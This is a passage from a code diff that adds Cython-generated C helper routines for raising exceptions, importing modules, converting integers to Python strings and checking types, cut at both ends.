bad; + } + if (cause) { + PyObject *fixed_cause; + if (cause == Py_None) { + fixed_cause = NULL; + } else if (PyExceptionClass_Check(cause)) { + fixed_cause = PyObject_CallObject(cause, NULL); + if (fixed_cause == NULL) + goto bad; + } else if (PyExceptionInstance_Check(cause)) { + fixed_cause = cause; + Py_INCREF(fixed_cause); + } else { + PyErr_SetString(PyExc_TypeError, + "exception causes must derive from " + "BaseException"); + goto bad; + } + PyException_SetCause(value, fixed_cause); + } + PyErr_SetObject(type, value); + if (tb) { + #if PY_VERSION_HEX >= 0x030C00A6 + PyException_SetTraceback(value, tb); + #elif CYTHON_FAST_THREAD_STATE + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject* tmp_tb = tstate->curexc_traceback; + if (tb != tmp_tb) { + Py_INCREF(tb); + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_tb); + } +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + PyErr_Fetch(&tmp_type, &tmp_value, &tmp_tb); + Py_INCREF(tb); + PyErr_Restore(tmp_type, tmp_value, tb); + Py_XDECREF(tmp_tb); +#endif + } +bad: + Py_XDECREF(owned_instance); + return; +} +#endif + +/* Import */ +static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level) { + PyObject *module = 0; + PyObject *empty_dict = 0; + PyObject *empty_list = 0; + #if PY_MAJOR_VERSION < 3 + PyObject *py_import; + py_import = __Pyx_PyObject_GetAttrStr(__pyx_b, __pyx_n_s_import); + if (unlikely(!py_import)) + goto bad; + if (!from_list) { + empty_list = PyList_New(0); + if (unlikely(!empty_list)) + goto bad; + from_list = empty_list; + } + #endif + empty_dict = PyDict_New(); + if (unlikely(!empty_dict)) + goto bad; + { + #if PY_MAJOR_VERSION >= 3 + if (level == -1) { + if ((1) && (strchr(__Pyx_MODULE_NAME, '.'))) { + #if CYTHON_COMPILING_IN_LIMITED_API + module = PyImport_ImportModuleLevelObject( + name, empty_dict, empty_dict, from_list, 1); + #else + module = PyImport_ImportModuleLevelObject( + name, __pyx_d, empty_dict, from_list, 1); + #endif + if (unlikely(!module)) { + if (unlikely(!PyErr_ExceptionMatches(PyExc_ImportError))) + goto bad; + PyErr_Clear(); + } + } + level = 0; + } + #endif + if (!module) { + #if PY_MAJOR_VERSION < 3 + PyObject *py_level = PyInt_FromLong(level); + if (unlikely(!py_level)) + goto bad; + module = PyObject_CallFunctionObjArgs(py_import, + name, __pyx_d, empty_dict, from_list, py_level, (PyObject *)NULL); + Py_DECREF(py_level); + #else + #if CYTHON_COMPILING_IN_LIMITED_API + module = PyImport_ImportModuleLevelObject( + name, empty_dict, empty_dict, from_list, level); + #else + module = PyImport_ImportModuleLevelObject( + name, __pyx_d, empty_dict, from_list, level); + #endif + #endif + } + } +bad: + Py_XDECREF(empty_dict); + Py_XDECREF(empty_list); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_import); + #endif + return module; +} + +/* ImportFrom */ +static PyObject* __Pyx_ImportFrom(PyObject* module, PyObject* name) { + PyObject* value = __Pyx_PyObject_GetAttrStr(module, name); + if (unlikely(!value) && PyErr_ExceptionMatches(PyExc_AttributeError)) { + const char* module_name_str = 0; + PyObject* module_name = 0; + PyObject* module_dot = 0; + PyObject* full_name = 0; + PyErr_Clear(); + module_name_str = PyModule_GetName(module); + if (unlikely(!module_name_str)) { goto modbad; } + module_name = PyUnicode_FromString(module_name_str); + if (unlikely(!module_name)) { goto modbad; } + module_dot = PyUnicode_Concat(module_name, __pyx_kp_u__3); + if (unlikely(!module_dot)) { goto modbad; } + full_name = PyUnicode_Concat(module_dot, name); + if (unlikely(!full_name)) { goto modbad; } + #if PY_VERSION_HEX < 0x030700A1 || (CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM < 0x07030400) + { + PyObject *modules = PyImport_GetModuleDict(); + if (unlikely(!modules)) + goto modbad; + value = PyObject_GetItem(modules, full_name); + } + #else + value = PyImport_GetModule(full_name); + #endif + modbad: + Py_XDECREF(full_name); + Py_XDECREF(module_dot); + Py_XDECREF(module_name); + } + if (unlikely(!value)) { + PyErr_Format(PyExc_ImportError, + #if PY_MAJOR_VERSION < 3 + "cannot import name %.230s", PyString_AS_STRING(name)); + #else + "cannot import name %S", name); + #endif + } + return value; +} + +/* GetAttr */ +static CYTHON_INLINE PyObject *__Pyx_GetAttr(PyObject *o, PyObject *n) { +#if CYTHON_USE_TYPE_SLOTS +#if PY_MAJOR_VERSION >= 3 + if (likely(PyUnicode_Check(n))) +#else + if (likely(PyString_Check(n))) +#endif + return __Pyx_PyObject_GetAttrStr(o, n); +#endif + return PyObject_GetAttr(o, n); +} + +/* HasAttr */ +static CYTHON_INLINE int __Pyx_HasAttr(PyObject *o, PyObject *n) { + PyObject *r; + if (unlikely(!__Pyx_PyBaseString_Check(n))) { + PyErr_SetString(PyExc_TypeError, + "hasattr(): attribute name must be string"); + return -1; + } + r = __Pyx_GetAttr(o, n); + if (!r) { + PyErr_Clear(); + return 0; + } else { + Py_DECREF(r); + return 1; + } +} + +/* ArgTypeTest */ +static int __Pyx__ArgTypeTest(PyObject *obj, PyTypeObject *type, const char *name, int exact) +{ + __Pyx_TypeName type_name; + __Pyx_TypeName obj_type_name; + if (unlikely(!type)) { + PyErr_SetString(PyExc_SystemError, "Missing type object"); + return 0; + } + else if (exact) { + #if PY_MAJOR_VERSION == 2 + if ((type == &PyBaseString_Type) && likely(__Pyx_PyBaseString_CheckExact(obj))) return 1; + #endif + } + else { + if (likely(__Pyx_TypeCheck(obj, type))) return 1; + } + type_name = __Pyx_PyType_GetName(type); + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, + "Argument '%.200s' has incorrect type (expected " __Pyx_FMT_TYPENAME + ", got " __Pyx_FMT_TYPENAME ")", name, type_name, obj_type_name); + __Pyx_DECREF_TypeName(type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return 0; +} + +/* CIntToDigits */ +static const char DIGIT_PAIRS_10[2*10*10+1] = { + "00010203040506070809" + "10111213141516171819" + "20212223242526272829" + "30313233343536373839" + "40414243444546474849" + "50515253545556575859" + "60616263646566676869" + "70717273747576777879" + "80818283848586878889" + "90919293949596979899" +}; +static const char DIGIT_PAIRS_8[2*8*8+1] = { + "0001020304050607" + "1011121314151617" + "2021222324252627" + "3031323334353637" + "4041424344454647" + "5051525354555657" + "6061626364656667" + "7071727374757677" +}; +static const char DIGITS_HEX[2*16+1] = { + "0123456789abcdef" + "0123456789ABCDEF" +}; + +/* BuildPyUnicode */ +static PyObject* __Pyx_PyUnicode_BuildFromAscii(Py_ssize_t ulength, char* chars, int clength, + int prepend_sign, char padding_char) { + PyObject *uval; + Py_ssize_t uoffset = ulength - clength; +#if CYTHON_USE_UNICODE_INTERNALS + Py_ssize_t i; +#if CYTHON_PEP393_ENABLED + void *udata; + uval = PyUnicode_New(ulength, 127); + if (unlikely(!uval)) return NULL; + udata = PyUnicode_DATA(uval); +#else + Py_UNICODE *udata; + uval = PyUnicode_FromUnicode(NULL, ulength); + if (unlikely(!uval)) return NULL; + udata = PyUnicode_AS_UNICODE(uval); +#endif + if (uoffset > 0) { + i = 0; + if (prepend_sign) { + __Pyx_PyUnicode_WRITE(PyUnicode_1BYTE_KIND, udata, 0, '-'); + i++; + } + for (; i < uoffset; i++) { + __Pyx_PyUnicode_WRITE(PyUnicode_1BYTE_KIND, udata, i, padding_char); + } + } + for (i=0; i < clength; i++) { + __Pyx_PyUnicode_WRITE(PyUnicode_1BYTE_KIND, udata, uoffset+i, chars[i]); + } +#else + { + PyObject *sign = NULL, *padding = NULL; + uval = NULL; + if (uoffset > 0) { + prepend_sign = !!prepend_sign; + if (uoffset > prepend_sign) { + padding = PyUnicode_FromOrdinal(padding_char); + if (likely(padding) && uoffset > prepend_sign + 1) { + PyObject *tmp; + PyObject *repeat = PyInt_FromSsize_t(uoffset - prepend_sign); + if (unlikely(!repeat)) goto done_or_error; + tmp = PyNumber_Multiply(padding, repeat); + Py_DECREF(repeat); + Py_DECREF(padding); + padding = tmp; + } + if (unlikely(!padding)) goto done_or_error; + } + if (prepend_sign) { + sign = PyUnicode_FromOrdinal('-'); + if (unlikely(!sign)) goto done_or_error; + } + } + uval = PyUnicode_DecodeASCII(chars, clength, NULL); + if (likely(uval) && padding) { + PyObject *tmp = PyNumber_Add(padding, uval); + Py_DECREF(uval); + uval = tmp; + } + if (likely(uval) && sign) { + PyObject *tmp = PyNumber_Add(sign, uval); + Py_DECREF(uval); + uval = tmp; + } +done_or_error: + Py_XDECREF(padding); + Py_XDECREF(sign); + } +#endif + return uval; +} + +/* CIntToPyUnicode */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_int(int value, Py_ssize_t width, char padding_char, char format_char) { + char digits[sizeof(int)*3+2]; + char *dpos, *end = digits + sizeof(int)*3+2; + const char *hex_digits = DIGITS_HEX; + Py_ssize_t length, ulength; + int prepend_sign, last_one_off; + int remaining; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (format_char == 'X') { + hex_digits += 16; + format_char = 'x'; + } + remaining = value; + last_one_off = 0; + dpos = end; + do { + int digit_pos; + switch (format_char) { + case 'o': + digit_pos = abs((int)(remaining % (8*8))); + remaining = (int) (remaining / (8*8)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_8 + digit_pos * 2, 2); + last_one_off = (digit_pos < 8); + break; + case 'd': + digit_pos = abs((int)(remaining % (10*10))); + remaining = (int) (remaining / (10*10)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_10 + digit_pos * 2, 2); + last_one_off = (digit_pos < 10); + break; + case 'x': + *(--dpos) = hex_digits[abs((int)(remaining % 16))]; + remaining = (int) (remaining / 16); + break; + default: + assert(0); + break; + } + } while (unlikely(remaining != 0)); + assert(!last_one_off || *dpos == '0'); + dpos += last_one_off; + length = end - dpos; + ulength = length; + prepend_sign = 0; + if (!is_unsigned && value <= neg_one) { + if (padding_char == ' ' || width <= length + 1) { + *(--dpos) = '-'; + ++length; + } else { + prepend_sign = 1; + } + ++ulength; + } + if (width > ulength) { + ulength = width; + } + if (ulength == 1) { + return PyUnicode_FromOrdinal(*dpos); + } + return __Pyx_PyUnicode_BuildFromAscii(ulength, dpos, (int) length, prepend_sign, padding_char); +} + +/* CIntToPyUnicode */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_Py_ssize_t(Py_ssize_t value, Py_ssize_t width, char padding_char, char format_char) { + char digits[sizeof(Py_ssize_t)*3+2]; + char *dpos, *end = digits + sizeof(Py_ssize_t)*3+2; + const char *hex_digits = DIGITS_HEX; + Py_ssize_t length, ulength; + int prepend_sign, last_one_off; + Py_ssize_t remaining; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const Py_ssize_t neg_one = (Py_ssize_t) -1, const_zero = (Py_ssize_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (format_char == 'X') { + hex_digits += 16; + format_char = 'x'; + } + remaining = value; + last_one_off = 0; + dpos = end; + do { + int digit_pos; + switch (format_char) { + case 'o': + digit_pos = abs((int)(remaining % (8*8))); + remaining = (Py_ssize_t) (remaining / (8*8)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_8 + digit_pos * 2, 2); + last_one_off = (digit_pos < 8); + break; + case 'd': + digit_pos = abs((int)(remaining % (10*10))); + remaining = (Py_ssize_t) (remaining / (10*10)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_10 + digit_pos * 2, 2); + last_one_off = (digit_pos < 10); + break; + case 'x': + *(--dpos) = hex_digits[abs((int)(remaining % 16))]; + remaining = (Py_ssize_t) (remaining / 16); + break; + default: + assert(0); + break; + } + } while (unlikely(remaining != 0)); + assert(!last_one_off || *dpos == '0'); + dpos += last_one_off; + length = end - dpos; + ulength = length; + prepend_sign = 0; + if (!is_unsigned && value <= neg_one) { + if (padding_char == ' ' || width <= length + 1) { + *(--dpos) = '-'; + ++length; + } else { + prepend_sign = 1; + } + ++ulength; + } + if (width > ulength) { + ulength = width; + } + if (ulength == 1) { + return PyUnicode_FromOrdinal(*dpos); + } + return __Pyx_PyUnicode_BuildFromAscii(ulength, dpos, (int) length, prepend_sign, padding_char); +} + +/* JoinPyUnicode */ +static PyObject* __Pyx_PyUnicode_Join(PyObject* value_tuple, Py_ssize_t value_count, Py_ssize_t result_ulength, + Py_UCS4 max_char) { +#if CYTHON_USE_UNICODE_INTERNALS && CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + PyObject *result_uval; + int result_ukind, kind_shift; + Py_ssize_t i, char_pos; + void *result_udata; + CYTHON_MAYBE_UNUSED_VAR(max_char); +#if CYTHON_PEP393_ENABLED + result_uval = PyUnicode_New(result_ulength, max_char); + if (unlikely(!result_uval)) return NULL; + result_ukind = (max_char <= 255) ? PyUnicode_1BYTE_KIND : (max_char <= 65535) ? PyUnicode_2BYTE_KIND : PyUnicode_4BYTE_KIND; + kind_shift = (result_ukind == PyUnicode_4BYTE_KIND) ? 2 : result_ukind - 1; + result_udata = PyUnicode_DATA(result_uval); +#else + result_uval = PyUnicode_FromUnicode(NULL, result_ulength); + if (unlikely(!result_uval)) return NULL; + result_ukind = sizeof(Py_UNICODE); + kind_shift = (result_ukind == 4) ? 2 : result_ukind - 1; + result_udata = PyUnicode_AS_UNICODE(result_uval); +#endif + assert(kind_shift == 2 || kind_shift == 1 || kind_shift == 0); + char_pos = 0; + for (i=0; i < value_count; i++) { + int ukind; + Py_ssize_t ulength; + void *udata; + PyObject *uval = PyTuple_GET_ITEM(value_tuple, i); + if (unlikely(__Pyx_PyUnicode_READY(uval))) + goto bad; + ulength = __Pyx_PyUnicode_GET_LENGTH(uval); + if (unlikely(!ulength)) + continue; + if (unlikely((PY_SSIZE_T_MAX >> kind_shift) - ulength < char_pos)) + goto overflow; + ukind = __Pyx_PyUnicode_KIND(uval); + udata = __Pyx_PyUnicode_DATA(uval); + if (!CYTHON_PEP393_ENABLED || ukind == result_ukind) { + memcpy((char *)result_udata + (char_pos << kind_shift), udata, (size_t) (ulength << kind_shift)); + } else { + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030300F0 || defined(_PyUnicode_FastCopyCharacters) + _PyUnicode_FastCopyCharacters(result_uval, char_pos, uval, 0, ulength); + #else + Py_ssize_t j; + for (j=0; j < ulength; j++) { + Py_UCS4 uchar = __Pyx_PyUnicode_READ(ukind, udata, j); + __Pyx_PyUnicode_WRITE(result_ukind, result_udata, char_pos+j, uchar); + } + #endif + } + char_pos += ulength; + } + return result_uval; +overflow: + PyErr_SetString(PyExc_OverflowError, "join() result is too long for a Python string"); +bad: + Py_DECREF(result_uval); + return NULL; +#else + CYTHON_UNUSED_VAR(max_char); + CYTHON_UNUSED_VAR(result_ulength); + CYTHON_UNUSED_VAR(value_count); + return PyUnicode_Join(__pyx_empty_unicode, value_tuple); +#endif +} + +/* DivInt[Py_ssize_t] */ +static CYTHON_INLINE Py_ssize_t __Pyx_div_Py_ssize_t(Py_ssize_t a, Py_ssize_t b) { + Py_ssize_t q = a / b; + Py_ssize_t r = a - q*b; + q -= ((r != 0) & ((r ^ b) < 0)); + return q; +} + +/* RaiseTooManyValuesToUnpack */ +static CYTHON_INLINE void __Pyx_RaiseTooManyValuesError(Py_ssize_t expected) { + PyErr_Format(PyExc_ValueError, + "too many values to unpack (expected %" CYTHON_FORMAT_SSIZE_T "d)", expected); +} + +/* RaiseNeedMoreValuesToUnpack */ +static CYTHON_INLINE void __Pyx_RaiseNeedMoreValuesError(Py_ssize_t index) { + PyErr_Format(PyExc_ValueError, + "need more than %" CYTHON_FORMAT_SSIZE_T "d value%.1s to unpack", + index, (index == 1) ? "" : "s"); +} + +/* RaiseNoneIterError */ +static CYTHON_INLINE void __Pyx_RaiseNoneNotIterableError(void) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not iterable"); +} + +/* ExtTypeTest */ +static CYTHON_INLINE int __Pyx_TypeTest(PyObject *obj, PyTypeObject *type) { + __Pyx_TypeName obj_type_name; + __Pyx_TypeName type_name; + if (unlikely(!type)) { + PyErr_SetString(PyExc_SystemError, "Missing type object"); + return 0; + } + if (likely(__Pyx_TypeCheck(obj, type))) + return 1; + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + type_name = __Pyx_PyType_GetName(type); + PyErr_Format(PyExc_TypeError, + "Cannot convert " __Pyx_FMT_TYPENAME " to " __Pyx_FMT_TYPENAME, + obj_type_name, type_name); + __Pyx_DECREF_TypeName(obj_type_name); + __Pyx_DECREF_TypeName(type_name); + return 0; +} + +/* GetTopmostException */ +#if CYTHON_USE_EXC_INFO_STACK && CYTHON_FAST_THREAD_STATE +static _PyErr_StackItem * +__Pyx_PyErr_GetTopmostException(PyThreadState *tstate) +{ + _PyErr_StackItem *exc_info = tstate->exc_info; + while ((exc_info->exc_value == NULL || exc_info->exc_value == Py_None) && + exc_info->previous_item != NULL) + { + exc_info = exc_info->previous_item; + } + return exc_info; +} +#endif + +/* SaveResetException */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx__ExceptionSave(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { + #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 + _PyErr_StackItem *exc_info = __Pyx_PyErr_GetTopmostException(tstate); + PyObject *exc_value = exc_info->exc_value; + if (exc_value == NULL || exc_value == Py_None) { + *value = NULL; + *type = NULL; + *tb = NULL; + } else { + *value = exc_value; + Py_INCREF(*value); + *type = (PyObject*) Py_TYPE(exc_value); + Py_INCREF(*type); + *tb = PyException_GetTraceback(exc_value); + } + #elif CYTHON_USE_EXC_INFO_STACK + _PyErr_StackItem *exc_info = __Pyx_PyErr_GetTopmostException(tstate); + *type = exc_info->exc_type; + *value = exc_info->exc_value; + *tb = exc_info->exc_traceback; + Py_XINCREF(*type); + Py_XINCREF(*value); + Py_XINCREF(*tb); + #else + *type = tstate->exc_type; + *value = tstate->exc_value; + *tb = tstate->exc_traceback; + Py_XINCREF(*type); + Py_XINCREF(*value); + Py_XINCREF(*tb); + #endif +} +static CYTHON_INLINE void __Pyx__ExceptionReset(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { + #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 + _PyErr_StackItem *exc_info = tstate->exc_info; + PyObject *tmp_value = exc_info->exc_value; + exc_info->exc_value = value; + Py_XDECREF(tmp_value); + Py_XDECREF(type); + Py_XDECREF(tb); + #else + PyObject *tmp_type, *tmp_value, *tmp_tb; + #if CYTHON_USE_EXC_INFO_STACK + _PyErr_StackItem *exc_info = tstate->exc_info; + tmp_type = exc_info->exc_type; + tmp_value = exc_info->exc_value; + tmp_tb = exc_info->exc_traceback; + exc_info->exc_type = type; + exc_info->exc_value = value; + exc_info->exc_traceback = tb; + #else + tmp_type = tstate->exc_type; + tmp_value = tstate->exc_value; + tmp_tb = tstate->exc_traceback; + tstate->exc_type = type; + tstate->exc_value = value; + tstate->exc_traceback = tb; + #endif + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); + #endif +} +#endif + +/* GetException */ +#if CYTHON_FAST_THREAD_STATE +static int __Pyx__GetException(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) +#else +static int __Pyx_GetException(PyObject **type, PyObject **value, PyObject **tb) +#endif +{ + PyObject *local_type = NULL, *local_value, *local_tb = NULL; +#if CYTHON_FAST_THREAD_STATE + PyObject *tmp_type, *tmp_value, *tmp_tb; + #if PY_VERSION_HEX >= 0x030C00A6 + local_value = tstate->current_exception; + tstate->current_exception = 0; + if (likely(local_value)) { + local_type = (PyObject*) Py_TYPE(local_value); + Py_INCREF(local_type); + local_tb = PyException_GetTraceback(local_value); + } + #else + local_type = tstate->curexc_type; + local_value = tstate->curexc_value; + local_tb = tstate->curexc_traceback; + tstate->curexc_type = 0; + tstate->curexc_value = 0; + tstate->curexc_traceback = 0; + #endif +#else + PyErr_Fetch(&local_type, &local_value, &local_tb); +#endif + PyErr_NormalizeException(&local_type, &local_value, &local_tb); +#if CYTHON_FAST_THREAD_STATE && PY_VERSION_HEX >= 0x030C00A6 + if (unlikely(tstate->current_exception)) +#elif CYTHON_FAST_THREAD_STATE + if (unlikely(tstate->curexc_type)) +#else + if (unlikely(PyErr_Occurred())) +#endif + goto bad; + #if PY_MAJOR_VERSION >= 3 + if (local_tb) { + if (unlikely(PyException_SetTraceback(local_value, local_tb) < 0)) + goto bad; + } + #endif + Py_XINCREF(local_tb); + Py_XINCREF(local_type); + Py_XINCREF(local_value); + *type = local_type; + *value = local_value; + *tb = local_tb; +#if CYTHON_FAST_THREAD_STATE + #if CYTHON_USE_EXC_INFO_STACK + { + _PyErr_StackItem *exc_info = tstate->exc_info; + #if PY_VERSION_HEX >= 0x030B00a4 + tmp_value = exc_info->exc_value; + exc_info->exc_value = local_value; + tmp_type = NULL; + tmp_tb = NULL; + Py_XDECREF(local_type); + Py_XDECREF(local_tb); + #else + tmp_type = exc_info->exc_type; + tmp_value = exc_info->exc_value; + tmp_tb = exc_info->exc_traceback; + exc_info->exc_type = local_type; + exc_info->exc_value = local_value; + exc_info->exc_traceback = local_tb; + #endif + } + #else + tmp_type = tstate->exc_type; + tmp_value = tstate->exc_value; + tmp_tb = tstate->exc_traceback; + tstate->exc_type = local_type; + tstate->exc_value = local_value; + tstate->exc_traceback = local_tb; + #endif + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); +#else + PyErr_SetExcInfo(local_type, local_value, local_tb); +#endif + return 0; +bad: + *type = 0; + *value = 0; + *tb = 0; + Py_XDECREF(local_type); + Py_XDECREF(local_value); + Py_XDECREF(local_tb); + return -1; +} + +/* SwapException */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx__ExceptionSwap(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { + PyObject *tmp_type, *tmp_value, *tmp_tb; + #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 + _PyErr_StackItem *exc_info = tstate->exc_info; + tmp_value = exc_info->exc_value; + exc_info->exc_value = *value; + if (tmp_value == NULL || tmp_value == Py_None) { + Py_XDECREF(tmp_value); + tmp_value = NULL; + tmp_type = NULL; + tmp_tb = NULL; + } else { + tmp_type = (PyObject*) Py_TYPE(tmp_value); + Py_INCREF(tmp_type); + #if CYTHON_COMPILING_IN_CPYTHON + tmp_tb = ((PyBaseExceptionObject*) tmp_value)->traceback; + Py_XINCREF(tmp_tb); + #else + tmp_tb = PyException_GetTraceback(tmp_value); + #endif + } + #elif CYTHON_USE_EXC_INFO_STACK + _PyErr_StackItem *exc_info = tstate->exc_info; + tmp_type = exc_info->exc_type; + tmp_value = exc_info->exc_value; + tmp_tb = exc_info->exc_traceback; + exc_info->exc_type = *type; + exc_info->exc_value = *value; + exc_info->exc_traceback = *tb; + #else + tmp_type = tstate->exc_type; + tmp_value = tstate->exc_value; + tmp_tb = tstate->exc_traceback; + tstate->exc_type = *type; + tstate->exc_value = *value; + tstate->exc_traceback = *tb; + #endif + *type = tmp_type; + *value = tmp_value; + *tb = tmp_tb; +} +#else +static CYTHON_INLINE void __Pyx_ExceptionSwap(PyObject **type, PyObject **value, PyObject **tb) { + PyObject *tmp_type, *tmp_value, *tmp_tb; + PyErr_GetExcInfo(&tmp_type, &tmp_value, &tmp_tb); + PyErr_SetExcInfo(*type, *value, *tb); + *type = tmp_type; + *value = tmp_value; + *tb = tmp_tb; +} +#endif + +/* ImportDottedModule */ +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx__ImportDottedModule_Error(PyObject *name, PyObject *parts_tuple, Py_ssize_t count) { + PyObject *partial_name = NULL, *slice = NULL, *sep = NULL; + if (unlikely(PyErr_Occurred())) { + PyErr_Clear(); + } + if (likely(PyTuple_GET_SIZE(parts_tuple) == count)) { + partial_name = name; + } else { + slice = PySequence_GetSlice(parts_tuple, 0, count); + if (unlikely(!slice)) + goto bad; + sep = PyUnicode_FromStringAndSize(".", 1); + if (unlikely(!sep)) + goto bad; + partial_name = PyUnicode_Join(sep, slice); + } + PyErr_Format( +#if PY_MAJOR_VERSION < 3 + PyExc_ImportError, + "No module named '%s'", PyString_AS_STRING(partial_name)); +#else +#if PY_VERSION_HEX >= 0x030600B1 + PyExc_ModuleNotFoundError, +#else + PyExc_ImportError, +#endif + "No module named '%U'", partial_name); +#endif +bad: + Py_XDECREF(sep); + Py_XDECREF(slice); + Py_XDECREF(partial_name); + return NULL; +} +#endif +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx__ImportDottedModule_Lookup(PyObject *name) { + PyObject *imported_module; +#if PY_VERSION_HEX < 0x030700A1 || (CYTHON_COMPILING_IN_PYPY && PYPY_VERSION_NUM < 0x07030400) + PyObject *modules = PyImport_GetModuleDict(); + if (unlikely(!modules)) + return NULL; + imported_module = __Pyx_PyDict_GetItemStr(modules, name); + Py_XINCREF(imported_module); +#else + imported_module = PyImport_GetModule(name); +#endif + return imported_module; +} +#endif +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple) { + Py_ssize_t i, nparts; + nparts = PyTuple_GET_SIZE(parts_tuple); + for (i=1; i < nparts && module; i++) { + PyObject *part, *submodule; +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + part = PyTuple_GET_ITEM(parts_tuple, i); +#else + part = PySequence_ITEM(parts_tuple, i); +#endif + submodule = __Pyx_PyObject_GetAttrStrNoError(module, part); +#if !(CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS) + Py_DECREF(part); +#endif + Py_DECREF(module); + module = submodule; + } + if (unlikely(!module)) { + return __Pyx__ImportDottedModule_Error(name, parts_tuple, i); + } + return module; +} +#endif +static PyObject *__Pyx__ImportDottedModule(PyObject *name, PyObject *parts_tuple) { +#if PY_MAJOR_VERSION < 3 + PyObject *module, *from_list, *star = __pyx_n_s__5; + CYTHON_UNUSED_VAR(parts_tuple); + from_list = PyList_New(1); + if (unlikely(!from_list)) + return NULL; + Py_INCREF(star); + PyList_SET_ITEM(from_list, 0, star); + module = __Pyx_Import(name, from_list, 0); + Py_DECREF(from_list); + return module; +#else + PyObject *imported_module; + PyObject *module = __Pyx_Import(name, NULL, 0); + if (!parts_tuple || unlikely(!module)) + return module; + imported_module = __Pyx__ImportDottedModule_Lookup(name); + if (likely(imported_module)) { + Py_DECREF(module); + return imported_module; + } + PyErr_Clear(); + return __Pyx_ImportDottedModule_WalkParts(module, name, parts_tuple); +#endif +} +static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple) { +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030400B1 + PyObject *module = __Pyx__ImportDottedModule_Lookup(name); + if (likely(module)) { + PyObject *spec = __Pyx_PyObject_GetAttrStrNoError(module, __pyx_n_s_spec); + if (likely(spec)) { + PyObject *unsafe = __Pyx_PyObject_GetAttrStrNoError(spec, __pyx_n_s_initializing); + if (likely(!unsafe || !__Pyx_PyObject_IsTrue(unsafe))) { + Py_DECREF(spec); + spec = NULL; + } + Py_XDECREF(unsafe); + } + if (likely(!spec)) { + PyErr_Clear(); + return module; + } + Py_DECREF(spec); + Py_DECREF(module); + } else if (PyErr_Occurred()) { + PyErr_Clear(); + } +#endif + return __Pyx__ImportDottedModule(name, parts_tuple); +} + +/* ssize_strlen */ +static CYTHON_INLINE Py_ssize_t __Pyx_ssize_strlen(const char *s) { + size_t len = strlen(s); + if (unlikely(len > PY_SSIZE_T_MAX)) { + PyErr_SetString(PyExc_OverflowError, "byte string is too long"); + return -1; + } + return (Py_ssize_t) len; +} + +/* FastTypeChecks */ +#if CYTHON_COMPILING_IN_CPYTHON +static int __Pyx_InBases(PyTypeObject *a, PyTypeObject *b) { + while (a) { + a = __Pyx_PyType_GetSlot(a, tp_base, PyTypeObject*); + if (a == b) + return 1; + } + return b == &PyBaseObject_Type; +} +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (a == b) return 1; + mro = a->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + if (PyTuple_GET_ITEM(mro, i) == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(a, b); +} +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b) { + PyObject *mro; + if (cls == a || cls == b) return 1; + mro = cls->tp_mro; + if (likely(mro)) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(mro); + for (i = 0; i < n; i++) { + PyObject *base = PyTuple_GET_ITEM(mro, i); + if (base == (PyObject *)a || base == (PyObject *)b) + return 1; + } + return 0; + } + return __Pyx_InBases(cls, a) || __Pyx_InBases(cls, b); +} +#if PY_MAJOR_VERSION == 2 +static int __Pyx_inner_PyErr_GivenExceptionMatches2(PyObject 